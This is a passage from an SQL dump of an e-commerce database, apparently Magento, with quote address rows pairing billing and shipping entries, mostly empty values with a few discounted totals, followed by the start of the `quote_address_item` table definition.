(2197, 1282, '2026-05-09 05:58:12', '2026-05-09 05:58:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2198, 1282, '2026-05-09 05:58:12', '2026-05-09 05:58:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2199, 1283, '2026-05-09 14:01:05', '2026-05-09 14:01:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2200, 1283, '2026-05-09 14:01:05', '2026-05-09 14:01:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2201, 1284, '2026-05-09 15:36:34', '2026-05-09 15:36:34', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2202, 1284, '2026-05-09 15:36:34', '2026-05-09 15:36:34', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2203, 1285, '2026-05-09 21:30:55', '2026-05-09 21:30:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2204, 1285, '2026-05-09 21:30:55', '2026-05-09 21:30:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2205, 1286, '2026-05-10 05:07:10', '2026-05-10 05:07:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2206, 1286, '2026-05-10 05:07:10', '2026-05-10 05:07:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2207, 1287, '2026-05-10 07:43:08', '2026-05-10 07:43:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2208, 1287, '2026-05-10 07:43:08', '2026-05-10 07:43:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2209, 1288, '2026-05-10 09:26:10', '2026-05-10 09:26:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2210, 1288, '2026-05-10 09:26:10', '2026-05-10 09:26:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2211, 1289, '2026-05-10 09:26:16', '2026-05-10 09:26:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2212, 1289, '2026-05-10 09:26:16', '2026-05-10 09:26:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2213, 1290, '2026-05-10 09:26:36', '2026-05-10 09:26:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2214, 1290, '2026-05-10 09:26:36', '2026-05-10 09:26:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2215, 1291, '2026-05-10 09:26:53', '2026-05-10 09:26:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2216, 1291, '2026-05-10 09:26:53', '2026-05-10 09:26:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2217, 1292, '2026-05-10 09:26:57', '2026-05-10 09:26:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2218, 1292, '2026-05-10 09:26:57', '2026-05-10 09:26:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2219, 1293, '2026-05-10 09:27:15', '2026-05-10 09:27:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2220, 1293, '2026-05-10 09:27:15', '2026-05-10 09:27:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2221, 1294, '2026-05-10 09:27:21', '2026-05-10 09:27:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2222, 1294, '2026-05-10 09:27:21', '2026-05-10 09:27:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2223, 1295, '2026-05-10 12:49:18', '2026-05-10 12:49:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2224, 1295, '2026-05-10 12:49:18', '2026-05-10 12:49:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2225, 1296, '2026-05-10 22:20:28', '2026-05-10 22:20:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2226, 1296, '2026-05-10 22:20:28', '2026-05-10 22:20:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2227, 1297, '2026-05-10 23:44:12', '2026-05-10 23:44:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2228, 1297, '2026-05-10 23:44:12', '2026-05-10 23:44:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2229, 1298, '2026-05-11 05:44:31', '2026-05-11 05:44:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2230, 1298, '2026-05-11 05:44:31', '2026-05-11 05:44:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2231, 1299, '2026-05-11 13:26:47', '2026-05-11 13:26:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2232, 1299, '2026-05-11 13:26:47', '2026-05-11 13:26:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2233, 1300, '2026-05-11 15:38:27', '2026-05-11 15:38:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2234, 1300, '2026-05-11 15:38:27', '2026-05-11 15:38:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2235, 1301, '2026-05-11 21:06:18', '2026-05-11 21:06:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2236, 1301, '2026-05-11 21:06:18', '2026-05-11 21:06:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2237, 1302, '2026-05-12 04:42:26', '2026-05-12 04:42:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2238, 1302, '2026-05-12 04:42:26', '2026-05-12 04:42:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2239, 1303, '2026-05-12 07:26:08', '2026-05-12 07:26:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2240, 1303, '2026-05-12 07:26:08', '2026-05-12 07:26:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1);

-- --------------------------------------------------------

--
-- Table structure for table `quote_address_item`
--

CREATE TABLE `quote_address_item` (
  `address_item_id` int(10) UNSIGNED NOT NULL COMMENT 'Address Item ID',
  `parent_item_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Parent Item ID',
  `quote_address_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Quote Address ID',
  `quote_item_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Quote Item ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `applied_rule_ids` text DEFAULT NULL COMMENT 'Applied Rule Ids',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `weight` decimal(12,4) DEFAULT 0.0000 COMMENT 'Weight',
  `qty` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty',
  `discount_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Discount Amount',
  `tax_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Tax Amount',
  `row_total` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Row Total',
  `base_row_total` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Row Total',
  `row_total_with_discount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Row Total With Discount',
  `base_discount_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Discount Amount',
  `base_tax_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Tax Amount',
  `row_weight` decimal(12,4) DEFAULT 0.0000 COMMENT 'Row Weight',
